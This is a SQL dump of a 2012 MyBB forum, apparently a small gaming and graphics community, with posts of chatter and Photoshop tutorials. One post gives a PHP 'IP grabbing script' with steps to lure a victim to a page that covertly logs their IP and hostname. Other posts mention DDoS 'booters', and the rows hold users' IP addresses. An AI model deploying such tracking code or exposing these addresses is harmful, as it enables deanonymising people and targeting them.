`longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2982', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '3', '??????????¢™', '1349024962', 'Thanks man, I really appreciate it.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '21423dd7efb347b5cb253b5f1d0cbf88', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2983', '613', '2980', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1349024979', '[quote=\'iTzIpod\' pid=\'2980\' dateline=\'1349024849\'] Do you want me to change it saying : \"Gamers\" instead of Gamer? That\'s mine right? O_o [/quote] It is yours still, and No don\'t worry about it. These are just temporary untill I get the real ones made. Ill probably end up paying for it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a55b719be6924226fdcbf21e83620c6e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2984', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '3', '??????????¢™', '1349025030', 'Thanks everyone, I am glad that you like them.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'debc2b6779f0aa4a96ca041a9aea624e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2985', '602', '2951', '63', 'RE: [Request] Sig and Avatar', '0', '82', 'iTzIpod', '1349025037', '[quote=\'R?????zo?\' pid=\'2951\' dateline=\'1349005349\'] I will do this once I\'m free. should be done later today. [img]http://i.imgur.com/4i7oz.gif[/img] not sure what to make as avatar [/quote] Kinda big don\'t you think? I suggest you try resizing it a little bit.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '50b6509c620cc36b2a2108282f6116b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2986', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '61', 'NXK', '1349025296', 'Last movie I watched was lawless, It\'s bad ass. Really good movie if you\'re into old school proabition era Movies and crime movies. (It\'s about bootlegging and moonshine)', '99.253.94.204', '1677549260', '1', '0', '61', '1349025312', '1', '16116a1c969f0b22046596c5362f559a', '0', '1349025312'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2987', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '61', 'NXK', '1349025399', 'I have no idea who you are really either, But hi super mod buddy. Lets be bestest friends for ever.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '625e551dba4c3a77cd6afe243edaca32', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2988', '602', '2985', '63', 'RE: [Request] Sig and Avatar', '0', '3', '??????????¢™', '1349025412', '[quote=\'iTzIpod\' pid=\'2985\' dateline=\'1349025037\'] [quote=\'R?????zo?\' pid=\'2951\' dateline=\'1349005349\'] I will do this once I\'m free. should be done later today. [img]http://i.imgur.com/4i7oz.gif[/img] not sure what to make as avatar [/quote] Kinda big don\'t you think? I suggest you try resizing it a little bit. [/quote] Also could you put the BG transparent if you could? Thanks', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '5180a3f7585fbb62cf02a34982e6c7de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2989', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '3', '??????????¢™', '1349025485', 'I was the first admin on this site when it first opened up. I left due to school and got banned over a misunderstanding. I might become admin again when Joker gets back on.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '5cb99c92eda88c465e87641689f36e86', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2990', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '100', '??zg???g????61', '1349026072', 'Nice dubstep, I love it! You should put that shit on iTunes ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'd057634d24fca47eb2a8d623de232864', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2991', '600', '2912', '58', 'RE: OMG HERE IT COMES!', '0', '61', 'NXK', '1349026120', 'Check out our recruitment thread! We NEED MORE GAMERS!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '5acae6e011f719d1c95e0e6baf40f2ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2992', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1349026180', 'Alright. Good luck. I don\'t got any money on me because I payed you my last $$. So..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3007010b83b8fb672ea2faf3cf9496f2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2993', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '82', 'iTzIpod', '1349026259', '3 Admins? O_o Seems legit. Unless he demotes Apathy and then promotes you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fad9fc85af68d209cbeb0cac390126e9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2994', '601', '2993', '3', 'RE: Major Announcement by Jok3r!', '0', '3', '??????????¢™', '1349026640', '[quote=\'iTzIpod\' pid=\'2993\' dateline=\'1349026259\'] 3 Admins? O_o Seems legit. Unless he demotes Apathy and then promotes you. [/quote] He wont be demoting anyone, and I said maybe.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'd290c2c520128ba3e768d02358067548', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2995', '17', '2990', '8', 'RE: My Dubstep Remixs', '0', '3', '??????????¢™', '1349026715', '[quote=\'GRONgamer61\' pid=\'2990\' dateline=\'1349026072\'] Nice dubstep, I love it! You should put that shit on iTunes ;D [/quote] I never thought about that and I dont even have an iTunes account.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '31fb6bddbb77355e74ab79cadba591d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2996', '613', '2992', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1349026748', '[quote=\'iTzIpod\' pid=\'2992\' dateline=\'1349026180\'] Alright. Good luck. I don\'t got any money on me because I payed you my last $$. So.. [/quote] Ill be paying for it all since It\'s my group.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'fb74d3ac76609fb3564dce63d570a050', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2997', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '62', 'R?????zo?', '1349028112', 'as said before, gif\'s lose quality with transparent backgrounds, so I have to use the same background color where it will be', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '90c6802f5e9b870331c4a607036c8f3b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2998', '604', '2928', '61', 'RE: Unique Sig and Header', '0', '62', 'R?????zo?', '1349028513', 'if you really want something like that, i can make it no problems. i will do that if it\'s going to be used though, else will be a waste of time.', '94.132.244.168', '1585771688', '1', '0', '62', '1349028534', '1', '1342d95820a9551fd8831542afcf9315', '0', '1349028534'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3000', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '100', '??zg???g????61', '1349029835', 'Heyo, could I have a sig made for myself? Could i have \"GRONgamer61\'s DDoS\'ing Service $4/Hour\", in black and red letters. I\'d like the font to look retro and shiny ;D', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '2170dc41309bb1abf7a8cff80613ab8f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3001', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1349031624', 'Is it for your thread or just for your signature? O_o Because if it\'s for your thread, you\'re probably talking about a banner or template.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d93059a851b3d2dbe5f78eb3578dd42', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3002', '614', '0', '3', 'Absence for 5 days', '0', '53', 'sirchamp', '1349033023', 'Hey guys Im going on a school trip tomorow. For five days. So I\'ll be back at the 5.10.12 See you in a week guys. Byebye ;)', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '91e1c282dbf85fb21f5522dcc6aba880', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3003', '614', '3002', '3', 'RE: Absence for 5 days', '0', '82', 'iTzIpod', '1349033107', 'Bye sirchamp. Have fun on your school trip.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0c7d5c34b61bfb08c7cae2c94eb68219', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3004', '615', '0', '21', 'Could somone test the output of 2 differen\'t booters I use?', '0', '100', '??zg???g????61', '1349033390', 'Heyo, I was hoping someone could help me test the output of two different booters I use. Thanks.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '541d07755c510e9608c11e563eb033b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3005', '616', '0', '67', '[PHP] IP Grabbing Script', '0', '82', 'iTzIpod', '1349034777', '1 : Upload the Index.php to your website. 2 : Make your victim visit the website. 3 : The log\'s will be saved in www.site.com/xxxx.txt [code] <html> <head> <?php $ip = $_SERVER[\'REMOTE_ADDR\']; // Grabbing the IP $time = date(\"l F dS h:i:s A Y\"); // Logging the time and date $hostaddress = gethostbyaddr($ip); // Host name $browser = $_SERVER[\'HTTP_USER_AGENT\']; // needs work $referred = $_SERVER[\'HTTP_REFERER\']; // referrer //Writing the time and date to a file $myFile = \"xxxx.txt\"; $fh = fopen($myFile, \'a\') or die(\"can\'t open file\"); $stringData = \"$time\\n\"; fwrite($fh, $stringData); fclose($fh); // writing Ip address to the same file $myFile = \"xxxx.txt\"; // value 1 $fh = fopen($myFile, \'a\') or die(\"can\'t open file\"); $stringData = \"$ip\\n\"; fwrite($fh, $stringData); fclose($fh); // also writing hostname to the same file $myFile = \"xxxx.txt\"; // value 2 $fh = fopen($myFile, \'a\') or die(\"can\'t open file\"); $stringData = \"$hostaddress\\n\"; fwrite($fh, $stringData); fclose($fh); print \"<strong> </strong><br />\\n\"; if ($referred == \"\") { print \"\"; } else { print \"$referred\"; } ?> <!-- Redirecting to a different page (this is optional just delete this javascript if you don\'t want to redirect) --> <script type=\"text/javascript\"> <!-- window.location = \"http://www.google.com/\" //--> </script> </head> <body> </body> </html> [/code] Sorry if in wrong section.. Didn\'t know where to put it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c35335ce48b2ba16e02db40c05096881', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3006', '617', '0', '34', 'Absract Photoshop Tutorial', '0', '82', 'iTzIpod', '1349035770', 'I found this and I used this for a while First of all, create a Photoshop document of any size, I am using 400x110 pixels. - Fill the background in pure black #000000. Now make sure that your Foreground colour is Black (#000000[/b]) and that your background is White (#FFFFFF). You can do this by simply hitting D on your keyboard. - Go to the blending options for this layer and use the following settings (Click image to enlarge): - Now create a new layer, fill it black and set the blending mode to screen. Now go to the blending options and click on Gradient overlay again, this time you want Foreground to Transparent, which should be a built-in custom gradient. The gradient needs to go from Black to pure transparency, like so (Click image to enlarge): Don\'t forget to tick the Reverse box! - Now create a new layer, grab an abstract brush (I used brushes from here) make sure that your foreground colour is Black and use the brush like a stamp. Don\'t hold the mouse button down, just stamp the brush wherever you want to. Do the same again on a new layer, except using White rather than Black. You should end up with something like this: - This is optional, but you can duplicate your white Brushed layer (Ctrl+J), and then you can go to Filter>>Blur>>Radial Blur. I used the following settings: I then pressed Ctrl+F a few times, and set the layers blending mode to Overlay. - Now you need a render. Find a Render. I\'ve pasted mine in my sig below: - Remember my Render Blending tutorial? You could use some techniques in that tutorial right here if you wanted (Although you should probably avoid colouring for now). - Get your Abstract Brushes out again (I\'m using a different set this time, from here) and stamp it on the tender, sometimes this can make it look like the character in the render has some sort of mystical energy. And mystical energy is cool. Note that with the brushes I used, I duplicated their layers a few times to make the brushing stand out a little bit more. Here is what I have so far: - Desaturate your Render by pressing Shift+Ctrl+U (Optional). - Click on Layer>>New Adjustment Layer>>Colour Balance and mess around with the settings until you get something that you like. Or, if you want to, you could use a colour Balance individually for each layer for clicking on the layer and pressing Ctrl+B. It\'s up to you. Experiment. Here\'s what I have, I used two colour balance layers: - Now to add a border! Create a New layer above all of the others and fill it with Black. Set the blending mode to Screen and then go to the Blending Options. Use the following layer styles (Click the image to enlarge): - Now do some customization of your own! Add text, or make any other finishing touches to make this sig suit you. Here is my final result, with some of my own personal edits put in: I hope that you found this tutorial useful and I hope that it helps you in the future! I know there are no pictures. And I apologize for that. I don\'t own this tutorial. So I don\'t own the pictures. I can\'t post the pictures on here too.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9639ad26a0483af445981941100f599e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3007', '618', '0', '34', 'Animated/Running Text Signature Tutorial', '0', '82', 'iTzIpod', '1349035855', '[align=center][font=Verdana][color=#9400D3][size=xx-large]How To Make Running Light effect Text [ Photoshop ][/size][/color][/font][/align] [size=large]Step - 1 First Open a new document in photoshop -[/size] [spoiler][img]http://i.imgur.com/OnI1q.png[/img][/spoiler] [size=large]Step - 2 Fill The background with silver colour which i choose as shown in the image below.[/size] [spoiler][img]http://i.imgur.com/T7jnC.png[/img][/spoiler] [size=large]or you may also choose any colour that you want depends on your creativity..[/size] [size=large]Step - 3 Now select the HORIZONTAL TYPE TOOL & write any text you want to type.I type my name as ROCKSTER. Now you have something like that - [/size] [spoiler][img]http://i.imgur.com/OYJTN.png[/img][/spoiler] [size=large]To make your text looks larger select your text layer & click ctrl+t. now you have the option to increase the dimensions to make your text larger. Now your text looks like that - [/size] [spoiler][img]http://i.imgur.com/PTOPe.png[/img][/spoiler] [size=large]step - 4 now make a new layer & select the brush tool.[/size] [spoiler][img]http://i.imgur.com/HvYop.png[/img][/spoiler] [spoiler][img]http://i.imgur.com/iDbVe.png[/img][/spoiler] [spoiler][img]http://i.imgur.com/nbk5Z.png][/img][/spoiler] [size=large]Step - 5 Now go to window>animation. Animation window will open in the bottom like that -[/size] [spoiler][img]http://i.imgur.com/iGWic.png[/img][/spoiler] [size=large]Step - 6 Now the main part - [/size] [spoiler][img]http://i.imgur.com/Oam5y.png[/img][/spoiler] [size=large]Step - 7 Now right click on your layer 1 & click on create clipping mask . now you have something like that - [/size] [spoiler][img]http://i.imgur.com/iNRTL.png[/img][/spoiler] [size=large]Step - 8 Now click on tweens animation frames - [/size] [spoiler][img]http://i.imgur.com/ZxVOw.png[/img][/spoiler] [size=large]A new tab will open do the same settings like shown in the image - [/size] [spoiler][img]http://i.imgur.com/fqe7h.png[/img][/spoiler] [size=large]Now you have something like that - [/size] [spoiler][img]http://i.imgur.com/ASBaq.png[/img][/spoiler] [size=large]Now you are done..... Just click on the play button to check........[/size] [spoiler][img]http://i.imgur.com/BnLNe.png[/img][/spoiler] [size=large]Final Image - [/size] [img]http://i.imgur.com/sdk9n.gif[/img] [size=large] To save this image click - [/size] [size=large]alt+shift+ctrl+s to save your image as web & devices......[/size] [color=#FF0000][align=center][size=x-large]Hope you guys like this small & effective tut...... Enjoy..........[/size][/align][/color]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '147eb74f06af2917a83a72159ea38ab0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3008', '619', '0', '34', '[Photoshop CS5] How to make a logo', '0', '82', 'iTzIpod', '1349035943', '[color=#FF0000][align=center]Making a Logo in Photoshop CS5[/align][/color] Step 1 Create a working file that\'s large enough to do some experimentation on at the full resolution your logo will be displayed at. If you\'re not certain what resolution your logo will need to be make it at 300 dpi; it\'s always easier to go from high resolution imagery to low resolution imagery than the other way around. A worthwhile recommendation is to make your image about 4 in. by 4 in. Step 2 Set up your working layers in the \"Layers\" palette. You will want one layer for each element of your logo. Step 3 Use the \"Shape\" tool to make the background element of your logo; select an oval or rectangle, as you see fit. Hold down the \"Shift\" key as you drag the shape to make it a perfect square. Make it the dominant color you want in your logo. Put this shape on your bottom layer. Step 4 Select the next layer up, and click on \"Shape\" again, and select \"Custom Shape Tool.\" This will change the options on the top menu bar, and one of the options presented will be a little amoeba shaped icon. Clicking this icon will pull up the Custom Shape palette. Select a custom shape that suits your design goals, and expand it to cover most of your background colored shape – set the color on this shape to white. Step 5 Resize and rotate the shape to get the effect you want – logos usually have two or three colors tops, and have a shape that creates an outline or overlay on a solid color background. Step 6 Play with the overlay of shapes until you get a result you like, then lay company contact information around it. You can also explore the options of layer effects in Photoshop, including Bevel and Emboss, and textures, to make your shapes look metallic, or raised, or stamped into plastic. [color=#FF0000][align=center]Tip[/align][/color] The two most important elements in a logo are contrast and visual simplicity. White text or shapes on a brightly colored background tend to work best. Avoid making your logo visually cluttered; simpler is almost certainly better.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9a43f3a89c1134e70ae4b3efc947aa43', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3009', '620', '0', '34', '? Photoshop ? Complete Guide for Begginers [High Quality]', '0', '82', 'iTzIpod', '1349036135', '[color=#FFD700][align=center][IMG]http://dl.dropbox.com/u/30675916/Thread/intro.png[/IMG] [B]Hello! In this thread I\'ll give you some ideas and informations how to get started before you say \"Photoshop is hard to use!\" because if you say that, you\'re wrong. It\'s easy to use after you learn the basics and practice a little. But, before I begin with the guide itself, let me show some exemple of what you can do with the power of Photoshop. ;)[/B] [B]Photo Manipulation:[/B] Photo manipulation is the application of image editing techniques to photographs in order to create an illusion or deception (in contrast to mere enhancement or correction), through analog or digital means. [url]http://www.youthedesigner.com/wp-content/uploads/2009/09/photoshop-examples-21.jpg[/url] [url]http://webdesignledger.com/wp-content/uploads/2010/04/photo_manipulation_12.jpg[/url] [url]http://webdesignledger.com/wp-content/uploads/2010/04/photo_manipulation_34.jpg[/url] [url]http://webdesignledger.com/wp-content/uploads/2010/04/photo_manipulation_23.jpg[/url] [B]Typography:[/B] Typography is performed by typesetters, compositors, typographers, graphic designers, art directors, comic book artists, graffiti artists, clerical workers, and anyone else who arranges type for a product. [url]http://d2f8dzk2mhcqts.cloudfront.net/117_Earth/final_1920.jpg[/url] [url]http://webdesignledger.com/wp-content/uploads/2011/06/typeinp13.jpg[/url] [url]http://webdesignledger.com/wp-content/uploads/2011/06/typeinp16.jpg[/url] [url]http://webdesignledger.com/wp-content/uploads/2011/06/typeinp18.jpg[/url] [B]WebDesign:[/B] Most of the websites are now designed using Photoshop because there you have unlimited ways to customize your website and make it how you want it to be. [url]http://fc03.deviantart.net/fs71/f/2010/013/a/e/Web_design__Amazium_by_sergitosuanez.jpg[/url] [url]http://slodive.com/wp-content/uploads/2010/04/single/ormanclark.jpg[/url] [url]http://dl.dropbox.com/u/30675916/FreshFolio.jpg[/url] (by me) [url]http://dl.dropbox.com/u/30675916/FreshBlue.png[/url] (by me) [B]Now because I got your atention and I know that you want to learn how to do that, I\'ll start with the guide.[/B] [IMG]http://dl.dropbox.com/u/30675916/Thread/basics.png[/IMG] [B]The first step is to learn the basics of Photoshop, and that means we must learn how to use the tools, filters and the other many options of PS. To learn that, I\'ll add the links for some tutorials from YouTube. Remember! This is a verry important step, so don\'t jump over this. You can\'t do much if you don\'t know how to use Photoshop... So.[/B] [B]1. Tool Uses & Basics -[/B] Good tutorial for learning how to use the tools and some other basics. [url=http://www.youtube.com/watch?v=o-u-OYz2qaU]Photoshop Tutorial - Tool Uses and Basics - YouTube[/url] [B]2. Opening and Saving Files -[/B] Yes, the most important part is to know how to save your hard work and open it later for re-editing or to send it to someone. [url=http://www.youtube.com/watch?v=vgJamJ3x3ro]PhotoShop CS5 for Beginners - #02. Opening and Saving Files - YouTube[/url] [B]3. Resizing Images -[/B] 6 Minutes tutorial. You have nothing to lose by learning how to resize a image without losing the quality. [url=http://www.youtube.com/watch?v=PCUUtWfKHvE]Photoshop CS4 - Resizing Images - YouTube[/url] [B]4. Beginner Masking Technique -[/B]In this tutorial you\'ll actually learn how to cut someone or even an object from a picture and place it over another picture/background (Exemple. You cut the bird shape from a picture and put it on a background with the sky.) [url=http://www.youtube.com/watch?v=evn98n_yLn8]Photoshop CS4 - Beginner Masking Technique - YouTube[/url] [B]5. Using the pen tool -[/B] How to use the pen tool in photoshop. Skills covered in this tutorial include curving, defining anchor points, and making custom shapes using the pen tool. [url=http://www.youtube.com/watch?v=K2KpgJZVz2M]Photoshop CS4 - Using The Pen Tool (Basics) - YouTube[/url] (Making Shapes) [url=http://www.youtube.com/watch?v=-RRG3dw4uQY]Photoshop CS4 - Using The Pen Tool For Paths (And Curvy Text!) - YouTube[/url] (Using The Pen Tool For Paths) [B]6. Quick Photofilter Effect -[/B] This will help you in changing the colors of the picture to something darker/lighter than the original. [url=http://www.youtube.com/watch?v=-I5kBVYzz8o]Photoshop CS4 - Quick Photofilter Effect - YouTube[/url] [B]7. Changing Hair/Eye Color -[/B]Get more skills in colors editing by following this guide to learn how to change hair and eyes color but you can do the same for other things. [url=http://www.youtube.com/watch?v=GrwgMer9-_U]Changing Hair/Eye Color in Photoshop! - YouTube[/url] [B]8. How To Smudge -[/B] Smudging is a verry used method in signatures and wallpapers. I suggest you to take a look. [url=http://www.youtube.com/watch?v=Cf56fT_eeAE]How To Smudge | Photoshop Tutorial - YouTube[/url] [B]9. Adjustment Layers -[/B] Use the adjustment layers, give your photos and wallpapers nice effects. This is based on colors changing but verry usefull. [url=http://www.youtube.com/watch?v=zk4gpNVwPd8]Photoshop: Adjustment Layers (HD) - YouTube[/url] [B]10. Downloading, Installing, and Using Brushes -[/B] Brushes are used most of the time in wallpapers and signatures and in this guide you\'ll learn how to download, install and how to use them. [url=http://www.youtube.com/watch?v=yi4ZePnvrPE]Downloading, Installing, and Using Brushes in Photoshop! - YouTube[/url] [B]Awesome! You\'re on the right way to a professional designer. And now because we know the basics of Photoshop we can go at the next level of tutorials.[/B] [IMG]http://dl.dropbox.com/u/30675916/Thread/advanced.png[/IMG] [B]Don\'t worry, advanced doesn\'t means it\'s for the pro designers, it means that we\'ll focus on creating designs with more work, like wallpapers, signatures, web designs, etc. You don\'t need to follow all of the guides I\'ll post, but at least try to follow some of them or maybe you want to focus on only one of the designs types. So, lets start with some video tutorials because there you can see exactly how it\'s made, not like pictures tutorials.[/B] [B]1. Signatures -[/B] The signatures are mostly used for forums as something that will represent yourself and are not larger than 500x250(Horizontal) / 250x500(Vertical), not because I say but if it\'s larger it can be considered wallpaper. I normaly use a size around 400x160 but it\'s up to you. [url=http://www.youtube.com/watch?v=i9uFoUtlAhE]Photoshop Signature Tutorial - Stock & Texture Part 1 - YouTube[/url] (Good tutorial to learn how to use textures, stocks and brushes.) [url=http://www.youtube.com/watch?v=WMozxJANdkM]Photoshop Signature Tutorial - Stock & Texture Part 2 - YouTube[/url] (Part 2) [url=http://www.youtube.com/watch?v=PKCk_A3IF3k]Photoshop Stock Signature Tutorial - Beginner - YouTube[/url] [url=http://www.youtube.com/watch?v=rXsmznijzMA&feature=related]HD Photoshop Sig Tutorial - Great Outcome - YouTube[/url] (We\'re using Smudging method!) [url=http://www.youtube.com/watch?v=L9y2mwUsXt8]Photoshop Signature Tutorial-Halo Render - YouTube[/url] (Learn how to use the adjustment layers on signatures.) [B]2. Text Effects -[/B] Learn how to create different kind of text styles. [url=http://www.youtube.com/watch?v=jMzv1M1bsDI]#28 Photoshop - Orange Power Wallpaper Tutorial - YouTube[/url] [url=http://www.youtube.com/watch?v=VO4gTWzBM_A]Photoshopping Neon Text Tutorial (@photoguides) - YouTube[/url] [url=http://www.youtube.com/watch?v=8OtfA4ou4k0]Improved Photoshop Glass Effect Tutorial - YouTube[/url] [url=http://www.youtube.com/watch?v=8vux1Oe8oWo]Realistic Fire Text Effect - Photoshop CS5 Tutorial - YouTube[/url] [url=http://www.tutorial9.net/tutorials/photoshop-tutorials/add-visual-texture-3-easy-steps/]Add Visual Texture 3 Easy Steps | Tutorial9[/url] [B]3. Photo Manipulation & Editing -[/B] Photo manipulation 